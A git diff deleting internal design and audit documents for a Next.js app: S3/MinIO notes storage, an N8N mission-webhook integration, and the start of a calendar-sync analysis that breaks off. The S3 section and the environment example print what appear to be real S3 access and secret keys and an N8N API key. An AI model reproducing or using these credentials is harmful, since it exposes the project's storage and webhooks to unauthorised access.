diff --git a/.DS_Store b/.DS_Store index 03adda7..680a9f9 100644 Binary files a/.DS_Store and b/.DS_Store differ diff --git a/ANALYSE_PAGES_S3.md b/ANALYSE_PAGES_S3.md deleted file mode 100644 index 94932d2..0000000 --- a/ANALYSE_PAGES_S3.md +++ /dev/null @@ -1,438 +0,0 @@ -# Analyse Complète : Page "Pages" et Intégration S3 - -## 📋 Vue d'ensemble - -La page `/pages` est une application de gestion de notes et contacts (carnet) qui utilise un stockage S3-compatible (MinIO) pour persister les données utilisateur. - ---- - -## 🗂️ Structure des Routes - -### Route Frontend -- **URL** : `/pages` -- **Fichier** : `app/pages/page.tsx` -- **Type** : Client Component (Next.js App Router) -- **Authentification** : Requise (redirection vers `/signin` si non authentifié) - -### Routes API - -#### 1. Routes Principales (`/api/storage/*`) -- **`GET /api/storage/status`** : Liste les dossiers disponibles pour l'utilisateur -- **`POST /api/storage/init`** : Initialise la structure de dossiers pour un nouvel utilisateur -- **`POST /api/storage/init/folder`** : Crée un dossier spécifique -- **`GET /api/storage/files?folder={folder}`** : Liste les fichiers d'un dossier -- **`GET /api/storage/files/content?path={path}`** : Récupère le contenu d'un fichier -- **`POST /api/storage/files`** : Crée un nouveau fichier -- **`PUT /api/storage/files`** : Met à jour un fichier existant -- **`DELETE /api/storage/files?id={id}`** : Supprime un fichier - -#### 2. Routes de Compatibilité (`/api/nextcloud/*`) -- **Adapter Pattern** : Les routes `/api/nextcloud/*` redirigent vers `/api/storage/*` -- **Raison** : Compatibilité avec l'ancien code qui utilisait NextCloud -- **Fichiers** : - - `app/api/nextcloud/status/route.ts` → Retourne les dossiers standards - - `app/api/nextcloud/files/route.ts` → Redirige vers `/api/storage/files` - ---- - -## 🧩 Composants Principaux - -### 1. **Page Principale** (`app/pages/page.tsx`) - -**Responsabilités** : -- Gestion de l'état global (notes, contacts, dossiers sélectionnés) -- Orchestration des trois panneaux (Navigation, Liste, Éditeur) -- Gestion du cache multi-niveaux -- Gestion responsive (mobile/tablette/desktop) - -**États Principaux** : -```typescript -- selectedFolder: string (Notes, Diary, Health, Contacts) -- selectedNote: Note | null -- selectedContact: Contact | null -- notes: Note[] -- contacts: Contact[] -- nextcloudFolders: string[] -``` - -**Cache** : -- **In-memory** : `notesCache`, `noteContentCache`, `foldersCache` -- **localStorage** : Cache persistant avec expiration (5-15 minutes) - -### 2. **Navigation** (`components/carnet/navigation.tsx`) - -**Fonctionnalités** : -- Affichage des dossiers (Notes, Diary, Health, Contacts) -- Recherche de dossiers -- Expansion du dossier Contacts pour afficher les fichiers VCF -- Icônes contextuelles par type de dossier - -**Dossiers Standards** : -- `Notes` → Bloc-notes -- `Diary` → Journal -- `Health` → Carnet de santé -- `Contacts` → Carnet d'adresses - -### 3. **NotesView** (`components/carnet/notes-view.tsx`) - -**Fonctionnalités** : -- Liste des notes avec recherche -- Tri par date de modification -- Affichage formaté des dates -- Actions : Créer, Supprimer, Sélectionner -- Formatage spécial pour Diary/Health (extraction de dates) - -### 4. **ContactsView** (`components/carnet/contacts-view.tsx`) - -**Fonctionnalités** : -- Liste des contacts avec recherche -- Filtrage par nom, email, organisation -- Support des fichiers VCF multiples -- Création de nouveaux contacts - -### 5. **Editor** (`components/carnet/editor.tsx`) - -**Fonctionnalités** : -- Édition de notes en Markdown -- Sauvegarde automatique (debounce 1 seconde) -- Cache du contenu pour performance -- Gestion des erreurs et états de chargement - -**Sauvegarde** : -- Auto-save après 1 seconde d'inactivité -- Utilise `PUT /api/storage/files` pour les mises à jour -- Invalide le cache après sauvegarde - -### 6. **ContactDetails** (`components/carnet/contact-details.tsx`) - -**Fonctionnalités** : -- Affichage détaillé d'un contact -- Édition inline des champs -- Support VCard (vCard 3.0) -- Sauvegarde dans fichiers VCF - ---- - -## 🔌 Configuration S3 - -### Fichier de Configuration (`lib/s3.ts`) - -```typescript -S3_CONFIG = { - endpoint: 'https://dome-api.slm-lab.net', - region: 'us-east-1', - bucket: process.env.S3_BUCKET || 'pages', - accessKey: '4aBT4CMb7JIMMyUtp4Pl', - secretKey: 'HGn39XhCIlqOjmDVzRK9MED2Fci2rYvDDgbLFElg' -} -``` - -**Type de Stockage** : MinIO (S3-compatible) -**Client** : AWS SDK v3 (`@aws-sdk/client-s3`) - -### Structure de Stockage - -``` -bucket: pages/ -└── user-{userId}/ - ├── notes/ - │ ├── note1.md - │ └── note2.md - ├── diary/ - │ └── 2024-01-15-entry.md - ├── health/ - │ └── health-record.md - └── contacts/ - ├── Allemanique.vcf - └── contacts.vcf -``` - -**Format des Clés S3** : -- Notes : `user-{userId}/{folder}/{title}.md` -- Contacts : `user-{userId}/contacts/{filename}.vcf` - -### Fonctions S3 Principales - -#### `putObject(key, content, contentType)` -- Upload un fichier vers S3 -- Convertit automatiquement les strings en Buffer UTF-8 -- Retourne la clé du fichier créé - -#### `getObjectContent(key)` -- Récupère le contenu d'un fichier -- Stream le contenu et le convertit en string UTF-8 -- Retourne `null` si le fichier n'existe pas - -#### `deleteObject(key)` -- Supprime un fichier de S3 -- Utilise `DeleteObjectCommand` - -#### `listUserObjects(userId, folder)` -- Liste les objets d'un dossier utilisateur -- Filtre les placeholders et dossiers vides -- Retourne métadonnées (nom, taille, date de modification) - -#### `createUserFolderStructure(userId)` -- Crée la structure de dossiers standard -- Crée des fichiers `.placeholder` pour chaque dossier -- Dossiers créés : `notes`, `diary`, `health`, `contacts` - ---- - -## 🔄 Flux de Données - -### 1. Initialisation - -``` -User Login - ↓ -POST /api/storage/init - ↓ -createUserFolderStructure(userId) - ↓ -Création des dossiers dans S3 - ↓ -GET /api/storage/status - ↓ -Affichage des dossiers dans Navigation -``` - -### 2. Chargement des Notes - -``` -User sélectionne un dossier - ↓ -Check cache (in-memory → localStorage) - ↓ -Si cache valide → Utiliser cache - ↓ -Sinon → GET /api/storage/files?folder={folder} - ↓ -listUserObjects(userId, folder) - ↓ -Mise à jour du cache + Affichage -``` - -### 3. Édition d'une Note - -``` -User sélectionne une note - ↓ -Check cache du contenu - ↓ -Si cache valide → Afficher - ↓ -Sinon → GET /api/storage/files/content?path={id} - ↓ -getObjectContent(key) - ↓ -Affichage dans Editor -``` - -### 4. Sauvegarde d'une Note - -``` -User modifie le contenu - ↓ -Debounce 1 seconde - ↓ -PUT /api/storage/files - ↓ -putObject(key, content, 'text/markdown') - ↓ -Invalidation du cache - ↓ -Rafraîchissement de la liste -``` - -### 5. Gestion des Contacts - -``` -User sélectionne "Contacts" - ↓ -GET /api/storage/files?folder=contacts - ↓ -Filtrage des fichiers .vcf - ↓ -Pour chaque VCF → GET /api/storage/files/content - ↓ -Parsing VCard avec vcard-parser - ↓ -Affichage dans ContactsView -``` - ---- - -## 🎨 Architecture UI - -### Layout Responsive - -**Desktop (> 1024px)** : -- 3 panneaux : Navigation | Liste | Éditeur -- Panneaux redimensionnables avec `PanelResizer` - -**Tablette (768px - 1024px)** : -- 2 panneaux : Navigation | Liste/Éditeur -- Navigation toujours visible - -**Mobile (< 768px)** : -- 1 panneau à la fois -- Bouton toggle pour navigation -- Navigation overlay - -### Système de Cache - -**Niveaux de Cache** : -1. **In-memory** : `useRef` pour performance immédiate -2. **localStorage** : Persistance entre sessions -3. **S3** : Source de vérité - -**Expiration** : -- Liste des notes : 5 minutes -- Contenu des notes : 15 minutes -- Liste des dossiers : 2 minutes - -**Invalidation** : -- Après sauvegarde d'une note -- Après création/suppression -- Après événement `note-saved` (CustomEvent) - ---- - -## 🔐 Sécurité - -### Authentification -- **NextAuth** : Vérification de session sur toutes les routes API -- **Isolation utilisateur** : Tous les chemins S3 incluent `user-{userId}/` -- **Validation** : Vérification que l'utilisateur ne peut accéder qu'à ses propres fichiers - -### Exemple de Validation -```typescript -// Dans /api/storage/files/content/route.ts -if (!key.startsWith(`user-${userId}/`)) { - return NextResponse.json({ error: 'Unauthorized' }, { status: 403 }); -} -``` - ---- - -## 📝 Formats de Fichiers - -### Notes -- **Format** : Markdown (`.md`) -- **MIME Type** : `text/markdown` -- **Structure** : Texte libre avec support Markdown - -### Contacts -- **Format** : vCard 3.0 (`.vcf`) -- **MIME Type** : `text/vcard` -- **Bibliothèque** : `vcard-parser` pour parsing/formatting -- **Structure** : Multiple vCards dans un fichier - -**Exemple VCard** : -``` -BEGIN:VCARD -VERSION:3.0 -UID:{id} -FN:{fullName} -EMAIL;TYPE=INTERNET:{email} -TEL;TYPE=CELL:{phone} -ORG:{organization} -ADR:{address} -NOTE:{notes} -END:VCARD -``` - ---- - -## 🐛 Points d'Attention - -### 1. **Compatibilité NextCloud/S3** -- Le code utilise parfois `/api/nextcloud/*` et parfois `/api/storage/*` -- Les routes NextCloud sont des adapters qui redirigent vers Storage -- **Recommandation** : Migrer progressivement vers `/api/storage/*` uniquement - -### 2. **Gestion de la Casse** -- Les noms de dossiers sont normalisés en lowercase pour S3 -- Mais l'affichage utilise la casse originale (Notes, Diary, etc.) -- **Risque** : Incohérences si un dossier est créé avec une casse différente - -### 3. **Cache Multi-Niveaux** -- Complexité de synchronisation entre caches -- **Risque** : Données obsolètes si invalidation incomplète - -### 4. **Credentials S3 en Dur** -- Les clés d'accès S3 sont hardcodées dans `lib/s3.ts` -- **Recommandation** : Utiliser des variables d'environnement - -### 5. **Gestion des Erreurs** -- Certaines erreurs sont loggées mais pas toujours remontées à l'utilisateur -- **Recommandation** : Améliorer le feedback utilisateur - ---- - -## 🚀 Améliorations Suggérées - -### 1. **Sécurité** -- [ ] Déplacer les credentials S3 vers variables d'environnement -- [ ] Implémenter des rate limits sur les API -- [ ] Ajouter une validation plus stricte des chemins - -### 2. **Performance** -- [ ] Implémenter un système de pagination pour les grandes listes -- [ ] Optimiser les requêtes S3 avec des préfixes plus spécifiques -- [ ] Ajouter un système de compression pour les gros fichiers - -### 3. **UX** -- [ ] Ajouter des indicateurs de synchronisation -- [ ] Implémenter un système de conflits pour les éditions simultanées -- [ ] Améliorer les messages d'erreur utilisateur - -### 4. **Architecture** -- [ ] Unifier les routes API (supprimer les adapters NextCloud) -- [ ] Créer un service layer pour abstraire S3 -- [ ] Implémenter des tests unitaires pour les fonctions S3 - ---- - -## 📊 Métriques et Monitoring - -### Endpoints à Monitorer -- Temps de réponse des requêtes S3 -- Taux d'erreur des opérations CRUD -- Utilisation du cache (hit rate) -- Taille des fichiers uploadés - -### Logs Importants -- Erreurs d'authentification -- Échecs de connexion S3 -- Échecs de parsing VCard -- Incohérences de cache - ---- - -## 🔗 Dépendances Clés - -```json -{ - "@aws-sdk/client-s3": "^3.802.0", - "@aws-sdk/s3-request-presigner": "^3.802.0", - "vcard-parser": "^x.x.x", - "next-auth": "^x.x.x" -} -``` - ---- - -## 📚 Références - -- **Fichier S3 Config** : `lib/s3.ts` -- **Page Principale** : `app/pages/page.tsx` -- **Routes API Storage** : `app/api/storage/**/*.ts` -- **Routes API NextCloud** : `app/api/nextcloud/**/*.ts` -- **Composants** : `components/carnet/*.tsx` - ---- - -*Document généré le : $(date)* -*Dernière mise à jour : Analyse complète du système Pages/S3* diff --git a/AUDIT_API_N8N_CONNECTION.md b/AUDIT_API_N8N_CONNECTION.md deleted file mode 100644 index e97bc94..0000000 --- a/AUDIT_API_N8N_CONNECTION.md +++ /dev/null @@ -1,724 +0,0 @@ -# 🔍 Audit Développeur Senior - Connexion API Next.js ↔️ N8N (Missions) - -**Date**: $(date) -**Auteur**: Audit Développeur Senior -**Objectif**: Vérifier et documenter la connexion entre Next.js et N8N pour la gestion des missions - ---- - -## 📋 Table des Matières - -1. [Architecture Globale](#architecture-globale) -2. [Flux de Communication](#flux-de-communication) -3. [Endpoints API](#endpoints-api) -4. [Configuration Requise](#configuration-requise) -5. [Sécurité](#sécurité) -6. [Points Critiques à Vérifier](#points-critiques-à-vérifier) -7. [Problèmes Potentiels et Solutions](#problèmes-potentiels-et-solutions) -8. [Tests et Validation](#tests-et-validation) -9. [Recommandations](#recommandations) - ---- - -## 🏗️ Architecture Globale - -### Vue d'ensemble - -``` -┌─────────────┐ ┌─────────────┐ ┌─────────────┐ -│ Next.js │────────▶│ N8N │────────▶│ Intégrations│ -│ (API) │ │ (Workflow) │ │ (Gitea, etc)│ -└─────────────┘ └─────────────┘ └─────────────┘ - │ │ - │ │ - └─────────────────────────┘ - (Callback) -``` - -### Composants Principaux - -1. **Next.js API Routes** - - `POST /api/missions` - Création de mission - - `POST /api/missions/mission-created` - Callback de N8N - - `GET /api/missions` - Liste des missions - -2. **Service N8N** (`lib/services/n8n-service.ts`) - - Envoi de données vers N8N - - Gestion des webhooks - - Gestion des erreurs - -3. **N8N Workflows** - - Webhook de réception: `/webhook/mission-created` - - Création des intégrations externes - - Callback vers Next.js - ---- - -## 🔄 Flux de Communication - -### 1. Création d'une Mission (Next.js → N8N → Next.js) - -``` -┌─────────────────────────────────────────────────────────────────┐ -│ ÉTAPE 1: Création Mission dans Next.js │ -└─────────────────────────────────────────────────────────────────┘ -POST /api/missions - ↓ -1. Validation des données -2. Création en base de données (Prisma) -3. Upload des fichiers (logo, attachments) vers Minio -4. Vérification des fichiers - ↓ -┌─────────────────────────────────────────────────────────────────┐ -│ ÉTAPE 2: Envoi vers N8N │ -└─────────────────────────────────────────────────────────────────┘ -POST https://brain.slm-lab.net/webhook/mission-created -Headers: - - Content-Type: application/json - - x-api-key: {N8N_API_KEY} -Body: - { - missionId: "uuid", - name: "...", - oddScope: [...], - services: [...], - config: { - N8N_API_KEY: "...", - MISSION_API_URL: "https://api.slm-lab.net/api" - }, - ... - } - ↓ -┌─────────────────────────────────────────────────────────────────┐ -│ ÉTAPE 3: Traitement N8N │ -└─────────────────────────────────────────────────────────────────┘ -N8N Workflow: - 1. Réception webhook - 2. Création Gitea repository (si service "Gite") - 3. Création Leantime project (si service "Leantime") - 4. Création Outline collection (si service "Documentation") - 5. Création RocketChat channel (si service "RocketChat") - 6. Préparation des données de callback - ↓ -┌─────────────────────────────────────────────────────────────────┐ -│ ÉTAPE 4: Callback N8N → Next.js │ -└─────────────────────────────────────────────────────────────────┘ -POST {MISSION_API_URL}/api/missions/mission-created -Headers: - - Content-Type: application/json - - x-api-key: {N8N_API_KEY} (depuis config.N8N_API_KEY) -Body: - { - missionId: "uuid", - gitRepoUrl: "...", - leantimeProjectId: "...", - documentationCollectionId: "...", - rocketchatChannelId: "..." - } - ↓ -┌─────────────────────────────────────────────────────────────────┐ -│ ÉTAPE 5: Mise à jour Mission dans Next.js │ -└─────────────────────────────────────────────────────────────────┘ -Validation API key -Recherche mission par missionId -Mise à jour des champs d'intégration: - - giteaRepositoryUrl - - leantimeProjectId - - outlineCollectionId - - rocketChatChannelId -``` - ---- - -## 🔌 Endpoints API - -### 1. POST /api/missions - -**Fichier**: `app/api/missions/route.ts` - -**Fonction**: Créer une nouvelle mission et déclencher le workflow N8N - -**Authentification**: -- Session utilisateur requise (via `getServerSession`) -- Vérification: `checkAuth(request)` - -**Body attendu**: -```typescript -{ - name: string; - oddScope: string[]; - niveau?: string; - intention?: string; - missionType?: string; - services?: string[]; - guardians?: Record; - volunteers?: string[]; - logo?: { data: string; name?: string; type?: string }; - attachments?: Array<{ data: string; name?: string; type?: string }>; -} -``` - -**Réponse**: -```json -{ - "success": true, - "mission": { ... }, - "message": "Mission created successfully with all integrations" -} -``` - -**Points critiques**: -- ✅ Mission créée en base AVANT l'envoi à N8N -- ✅ Fichiers uploadés et vérifiés AVANT l'envoi à N8N -- ✅ `missionId` inclus dans les données envoyées à N8N -- ✅ `config.N8N_API_KEY` et `config.MISSION_API_URL` inclus - ---- - -### 2. POST /api/missions/mission-created - -**Fichier**: `app/api/missions/mission-created/route.ts` - -**Fonction**: Recevoir les IDs d'intégration de N8N et mettre à jour la mission - -**Authentification**: -- **API Key** via header `x-api-key` -- **PAS** de session utilisateur requise (N8N n'a pas de session) - -**Headers requis**: -``` -x-api-key: {N8N_API_KEY} -Content-Type: application/json -``` - -**Body attendu**: -```typescript -{ - missionId: string; // ✅ Préféré (plus fiable) - // OU (fallback pour compatibilité) - name: string; - creatorId: string; - - // IDs d'intégration (optionnels) - gitRepoUrl?: string; - leantimeProjectId?: string | number; - documentationCollectionId?: string; - rocketchatChannelId?: string; -} -``` - -**Réponse succès**: -```json -{ - "success": true, - "message": "Mission updated successfully", - "mission": { - "id": "...", - "name": "...", - "giteaRepositoryUrl": "...", - "leantimeProjectId": "...", - "outlineCollectionId": "...", - "rocketChatChannelId": "..." - } -} -``` - -**Codes d'erreur**: -- `401` - API key invalide ou manquante -- `400` - Champs requis manquants -- `404` - Mission non trouvée -- `500` - Erreur serveur - -**Points critiques**: -- ✅ Validation stricte de l'API key -- ✅ Recherche par `missionId` (préféré) ou `name + creatorId` (fallback) -- ✅ Conversion `leantimeProjectId` de number vers string si nécessaire -- ✅ Mise à jour uniquement des champs fournis - ---- - -## ⚙️ Configuration Requise - -### Variables d'Environnement - -#### 1. N8N_API_KEY (OBLIGATOIRE) -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**Usage**: -- Envoyé à N8N dans `config.N8N_API_KEY` -- N8N l'utilise pour authentifier le callback -- Vérifié côté serveur dans `/api/missions/mission-created` - -**Où configurer**: -- `.env.local` (développement) -- Variables d'environnement production (CapRover, Vercel, Docker, etc.) - -**Vérification**: -```typescript -// Erreur si non défini -if (!process.env.N8N_API_KEY) { - logger.error('N8N_API_KEY is not set in environment variables'); -} -``` - ---- - -#### 2. N8N_WEBHOOK_URL (Optionnel) -```env -N8N_WEBHOOK_URL=https://brain.slm-lab.net/webhook/mission-created -``` - -**Valeur par défaut**: `https://brain.slm-lab.net/webhook/mission-created` - -**Usage**: URL du webhook N8N pour la création de mission - ---- - -#### 3. NEXT_PUBLIC_API_URL (Recommandé) -```env -NEXT_PUBLIC_API_URL=https://api.slm-lab.net/api -``` - -**Usage**: -- Envoyé à N8N dans `config.MISSION_API_URL` -- N8N l'utilise pour construire l'URL du callback -- Format attendu: `{MISSION_API_URL}/api/missions/mission-created` - -**Valeur par défaut**: `https://api.slm-lab.net/api` - ---- - -#### 4. N8N_ROLLBACK_WEBHOOK_URL (Optionnel) -```env -N8N_ROLLBACK_WEBHOOK_URL=https://brain.slm-lab.net/webhook/mission-rollback -``` - -**Usage**: URL du webhook N8N pour le rollback de mission - ---- - -### Configuration N8N Workflow - -#### Webhook de Réception - -**Path**: `mission-created` -**URL complète**: `https://brain.slm-lab.net/webhook/mission-created` -**Méthode**: `POST` -**Status**: Doit être **ACTIF** (toggle vert dans N8N) - ---- - -#### Node "Save Mission To API" - -**URL**: -``` -{{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created -``` - -**Méthode**: `POST` - -**Headers**: -``` -Content-Type: application/json -x-api-key: {{ $node['Process Mission Data'].json.config.N8N_API_KEY }} -``` - -**Body**: -```json -{ - "missionId": "{{ $node['Process Mission Data'].json.missionId }}", - "gitRepoUrl": "{{ $node['Create Git Repo'].json.url }}", - "leantimeProjectId": "{{ $node['Create Leantime Project'].json.id }}", - "documentationCollectionId": "{{ $node['Create Outline Collection'].json.id }}", - "rocketchatChannelId": "{{ $node['Create RocketChat Channel'].json.id }}" -} -``` - -**Points critiques**: -- ✅ Utiliser `config.MISSION_API_URL` (pas d'URL en dur) -- ✅ Utiliser `config.N8N_API_KEY` (pas de clé en dur) -- ✅ Inclure `missionId` dans le body -- ✅ Inclure tous les IDs d'intégration créés - ---- - -## 🔒 Sécurité - -### 1. Authentification API Key - -**Mécanisme**: -- N8N envoie `x-api-key` header -- Next.js compare avec `process.env.N8N_API_KEY` -- Si différent → `401 Unauthorized` - -**Code de validation** (`app/api/missions/mission-created/route.ts:42`): -```typescript -const apiKey = request.headers.get('x-api-key'); -const expectedApiKey = process.env.N8N_API_KEY; - -if (apiKey !== expectedApiKey) { - logger.error('Invalid API key', { - received: apiKey ? 'present' : 'missing', - expected: expectedApiKey ? 'configured' : 'missing' - }); - return NextResponse.json({ error: 'Unauthorized' }, { status: 401 }); -} -``` - -**Points critiques**: -- ✅ Comparaison stricte (pas de hash, clé en clair) -- ✅ Logging des tentatives invalides -- ✅ Pas de fallback si clé manquante - ---- - -### 2. Transmission de la Clé API - -**Flux**: -1. Next.js lit `process.env.N8N_API_KEY` -2. Next.js envoie à N8N dans `config.N8N_API_KEY` -3. N8N stocke temporairement dans le workflow -4. N8N renvoie dans header `x-api-key` lors du callback - -**Risque**: Si `N8N_API_KEY` est `undefined` au moment de l'envoi: -- N8N reçoit `undefined` ou chaîne vide -- N8N envoie chaîne vide dans le header -- Next.js rejette avec `401` - -**Solution**: Vérifier que `N8N_API_KEY` est défini avant l'envoi à N8N - ---- - -### 3. Validation des Données - -**Côté Next.js**: -- ✅ Validation des champs requis -- ✅ Recherche de mission par `missionId` (plus sûr que `name + creatorId`) -- ✅ Conversion de types (number → string pour `leantimeProjectId`) - -**Côté N8N**: -- ⚠️ Pas de validation visible dans le code Next.js -- ⚠️ N8N doit valider les données avant création des intégrations - ---- - -## ⚠️ Points Critiques à Vérifier - -### 1. Configuration Environnement - -- [ ] `N8N_API_KEY` est défini dans l'environnement -- [ ] `N8N_API_KEY` a la même valeur partout (dev, staging, prod) -- [ ] `NEXT_PUBLIC_API_URL` pointe vers la bonne URL -- [ ] Application redémarrée après modification des variables - ---- - -### 2. Workflow N8N - -- [ ] Workflow est **ACTIF** (toggle vert) -- [ ] Webhook path est correct: `mission-created` -- [ ] Node "Save Mission To API" utilise `config.MISSION_API_URL` -- [ ] Node "Save Mission To API" utilise `config.N8N_API_KEY` -- [ ] Node "Save Mission To API" inclut `missionId` dans le body -- [ ] Tous les IDs d'intégration sont inclus dans le callback - ---- - -### 3. Flux de Données - -- [ ] `missionId` est envoyé à N8N lors de la création -- [ ] `missionId` est renvoyé par N8N dans le callback -- [ ] Les IDs d'intégration sont correctement mappés: - - `gitRepoUrl` → `giteaRepositoryUrl` - - `leantimeProjectId` → `leantimeProjectId` (string) - - `documentationCollectionId` → `outlineCollectionId` - - `rocketchatChannelId` → `rocketChatChannelId` - ---- - -### 4. Gestion d'Erreurs - -- [ ] Erreurs N8N sont loggées -- [ ] Rollback en cas d'échec (si configuré) -- [ ] Messages d'erreur clairs pour debugging -- [ ] Pas de données sensibles dans les logs - ---- - -## 🐛 Problèmes Potentiels et Solutions - -### Problème 1: 401 Unauthorized - -**Symptômes**: -``` -Invalid API key { received: 'present', expected: 'configured' } -``` - -**Causes possibles**: -1. `N8N_API_KEY` non défini dans l'environnement -2. `N8N_API_KEY` différent entre Next.js et N8N -3. N8N envoie une clé vide ou `undefined` - -**Solutions**: -1. Vérifier que `N8N_API_KEY` est défini: - ```bash - echo $N8N_API_KEY - ``` -2. Vérifier la valeur dans N8N: - - Ouvrir l'exécution du workflow - - Vérifier `config.N8N_API_KEY` dans "Process Mission Data" -3. S'assurer que la même clé est utilisée partout - ---- - -### Problème 2: 404 Mission Not Found - -**Symptômes**: -``` -Mission not found { missionId: "...", name: "...", creatorId: "..." } -``` - -**Causes possibles**: -1. `missionId` non envoyé par N8N -2. `missionId` incorrect -3. Mission supprimée entre temps - -**Solutions**: -1. Vérifier que N8N envoie `missionId`: - ```json - { - "missionId": "{{ $node['Process Mission Data'].json.missionId }}" - } - ``` -2. Vérifier que Next.js envoie `missionId` à N8N: - ```typescript - config: { - missionId: mission.id // ✅ Inclus dans n8nData - } - ``` -3. Utiliser le fallback `name + creatorId` si `missionId` manquant - ---- - -### Problème 3: 500 Server Configuration Error - -**Symptômes**: -``` -N8N_API_KEY not configured in environment -``` - -**Cause**: `process.env.N8N_API_KEY` est `undefined` - -**Solution**: -1. Ajouter `N8N_API_KEY` à `.env.local` ou variables d'environnement -2. Redémarrer l'application -3. Vérifier avec un endpoint de test - ---- - -### Problème 4: 404 Webhook Not Registered - -**Symptômes**: -``` -404 Error: The requested webhook "mission-created" is not registered. -Hint: Click the 'Execute workflow' button on the canvas, then try again. -``` - -**Cause**: Workflow N8N n'est pas actif - -**Solution**: -1. Ouvrir le workflow dans N8N -2. Activer le toggle "Active" (devrait être vert) -3. Vérifier que le webhook node est actif - ---- - -### Problème 5: IDs d'Intégration Non Sauvegardés - -**Symptômes**: -- Mission créée mais `giteaRepositoryUrl`, `leantimeProjectId`, etc. sont `null` - -**Causes possibles**: -1. N8N ne rappelle pas `/api/missions/mission-created` -2. N8N rappelle mais avec des IDs manquants -3. Erreur lors de la mise à jour en base - -**Solutions**: -1. Vérifier les logs N8N (Executions) -2. Vérifier que le node "Save Mission To API" s'exécute -3. Vérifier les logs Next.js pour "Mission Created Webhook Received" -4. Vérifier que tous les IDs sont inclus dans le body du callback - ---- - -## 🧪 Tests et Validation - -### Test 1: Vérifier Configuration - -**Endpoint de test** (à créer): -```typescript -// app/api/test-n8n-config/route.ts -import { NextResponse } from 'next/server'; - -export async function GET() { - return NextResponse.json({ - hasN8NApiKey: !!process.env.N8N_API_KEY, - n8nApiKeyLength: process.env.N8N_API_KEY?.length || 0, - n8nWebhookUrl: process.env.N8N_WEBHOOK_URL || 'https://brain.slm-lab.net/webhook/mission-created', - missionApiUrl: process.env.NEXT_PUBLIC_API_URL || 'https://api.slm-lab.net/api' - }); -} -``` - -**Usage**: `GET /api/test-n8n-config` - ---- - -### Test 2: Tester Webhook N8N - -```bash -curl -X POST https://brain.slm-lab.net/webhook/mission-created \ - -H "Content-Type: application/json" \ - -d '{"test": "data"}' -``` - -**Résultats attendus**: -- ✅ `200/400/500` avec erreur workflow: Webhook actif -- ❌ `404` avec "webhook not registered": Webhook inactif - ---- - -### Test 3: Tester Callback Endpoint - -```bash -curl -X POST https://api.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: YOUR_N8N_API_KEY" \ - -d '{ - "missionId": "test-mission-id", - "gitRepoUrl": "https://git.example.com/repo", - "leantimeProjectId": "123" - }' -``` - -**Résultats attendus**: -- ✅ `200` avec `success: true`: API key valide -- ❌ `401`: API key invalide -- ❌ `404`: Mission non trouvée (normal si missionId de test) - ---- - -### Test 4: Créer une Mission Complète - -1. Créer une mission via le frontend -2. Vérifier les logs Next.js: - - ✅ "Mission created successfully" - - ✅ "Starting N8N workflow" - - ✅ "N8N workflow result { success: true }" -3. Vérifier les logs N8N (Executions): - - ✅ Workflow exécuté avec succès - - ✅ Node "Save Mission To API" exécuté -4. Vérifier la base de données: - - ✅ Mission a les IDs d'intégration sauvegardés - ---- - -## 💡 Recommandations - -### 1. Amélioration de la Sécurité - -**Problème actuel**: Clé API en clair, comparaison simple - -**Recommandations**: -- [ ] Utiliser un système de tokens avec expiration -- [ ] Implémenter un système de signature HMAC -- [ ] Ajouter un rate limiting sur `/api/missions/mission-created` -- [ ] Logging des tentatives d'accès invalides avec IP - ---- - -### 2. Amélioration de la Robustesse - -**Problème actuel**: Pas de retry automatique si N8N échoue - -**Recommandations**: -- [ ] Implémenter un système de retry avec backoff exponentiel -- [ ] Queue de messages pour les callbacks manqués -- [ ] Webhook de santé pour vérifier que N8N est accessible -- [ ] Timeout configurable pour les appels N8N - ---- - -### 3. Amélioration du Debugging - -**Problème actuel**: Logs dispersés, pas de traçabilité complète - -**Recommandations**: -- [ ] Ajouter un `correlationId` pour tracer une mission de bout en bout -- [ ] Logs structurés avec contexte complet -- [ ] Dashboard de monitoring des intégrations -- [ ] Alertes en cas d'échec répété - ---- - -### 4. Amélioration de la Documentation - -**Recommandations**: -- [ ] Documenter le format exact attendu par N8N -- [ ] Exemples de payloads complets -- [ ] Diagrammes de séquence détaillés -- [ ] Guide de troubleshooting avec cas réels - ---- - -### 5. Tests Automatisés - -**Recommandations**: -- [ ] Tests unitaires pour `N8nService` -- [ ] Tests d'intégration pour les endpoints API -- [ ] Tests E2E avec mock N8N -- [ ] Tests de charge pour vérifier la scalabilité - ---- - -## 📝 Checklist de Vérification Rapide - -### Configuration -- [ ] `N8N_API_KEY` défini et identique partout -- [ ] `NEXT_PUBLIC_API_URL` pointe vers la bonne URL -- [ ] Application redémarrée après modifications - -### N8N Workflow -- [ ] Workflow actif (toggle vert) -- [ ] Webhook path: `mission-created` -- [ ] Node "Save Mission To API" configuré correctement -- [ ] `missionId` inclus dans le callback - -### Code Next.js -- [ ] `missionId` envoyé à N8N lors de la création -- [ ] Validation API key fonctionnelle -- [ ] Mapping des champs correct -- [ ] Gestion d'erreurs appropriée - -### Tests -- [ ] Test de création de mission réussi -- [ ] IDs d'intégration sauvegardés en base -- [ ] Logs sans erreurs critiques - ---- - -## 🔗 Références - -- **Service N8N**: `lib/services/n8n-service.ts` -- **Endpoint création**: `app/api/missions/route.ts` -- **Endpoint callback**: `app/api/missions/mission-created/route.ts` -- **Documentation N8N**: Voir fichiers `N8N_*.md` dans le projet - ---- - -**Document créé le**: $(date) -**Dernière mise à jour**: $(date) -**Version**: 1.0 - diff --git a/CALENDAR_SYNC_ARCHITECTURE_ANALYSIS.md b/CALENDAR_SYNC_ARCHITECTURE_ANALYSIS.md deleted file mode 100644 index d28d0b9..0000000 --- a/CALENDAR_SYNC_ARCHITECTURE_ANALYSIS.md +++ /dev/null @@ -1,728 +0,0 @@ -# Calendar Synchronization Architecture - Deep Analysis - -## Executive Summary - -This document provides a comprehensive architectural analysis of the calendar synchronization system, focusing on: -- **Agenda Widget** (Dashboard widget) -- **Agenda Page** (Full calendar view) -- **Courrier Page** (Email integration) -- **Calendar Synchronization Services** (Infomaniak CalDAV & Microsoft Graph API) - ---- - -## 1. System Architecture Overview - -### 1.1 Component Hierarchy - -``` -┌─────────────────────────────────────────────────────────────┐ -│ Dashboard (app/page.tsx) │ -│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │ -│ │ Calendar │ │ News │ │ Email │ │ -│ │ Widget │ │ Widget │ 